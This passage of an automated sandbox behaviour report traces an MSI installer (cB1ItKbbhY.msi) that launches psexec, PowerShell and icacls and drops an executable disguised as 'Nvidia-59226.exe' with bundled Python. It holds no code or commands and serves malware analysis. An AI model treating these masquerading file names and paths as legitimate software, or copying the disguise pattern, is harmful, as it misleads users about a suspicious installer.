    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpSection loaded: msi.dllJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpSection loaded: slc.dllJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\Installer\MSI2EE6.tmpSection loaded: apphelp.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: slc.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bitsproxy.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: python313.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: magnification.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: version.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: wsock32.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: d3d9.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: security.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: olepro32.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: winhttpcom.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: webio.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: python313.dll
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: magnification.dll
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: netapi32.dll
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: version.dll
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: wsock32.dll
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: wtsapi32.dll
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: d3d9.dll
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: dwmapi.dll
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: kernel.appcore.dll
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: dwmapi.dll
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: windows.storage.dll
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: wldp.dll
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: netutils.dll
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: uxtheme.dll
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: security.dll
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: secur32.dll
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: sspicli.dll
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: olepro32.dll
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: vcruntime140.dll
    Source: C:\Nvidia-59226\Nvidia-59226.exeSection loaded: textshaping.dll
    Source: C:\Windows\Installer\MSI2EE6.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: dummy_app.exe.lnk.2.drLNK file: ..\..\..\..\..\..\Program Files (x86)\Dasmei support\App Dasmei installer\dummy_app.exe
    Source: dummy_app.exe.lnk0.2.drLNK file: ..\..\..\Program Files (x86)\Dasmei support\App Dasmei installer\dummy_app.exe
    Source: Nvidia-59226.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Nvidia-59226\Nvidia-59226.exe
    Source: C:\Nvidia-59226\Nvidia-59226.exeWindow found: window name: TEditJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: cB1ItKbbhY.msiStatic file information: File size 3372544 > 1048576
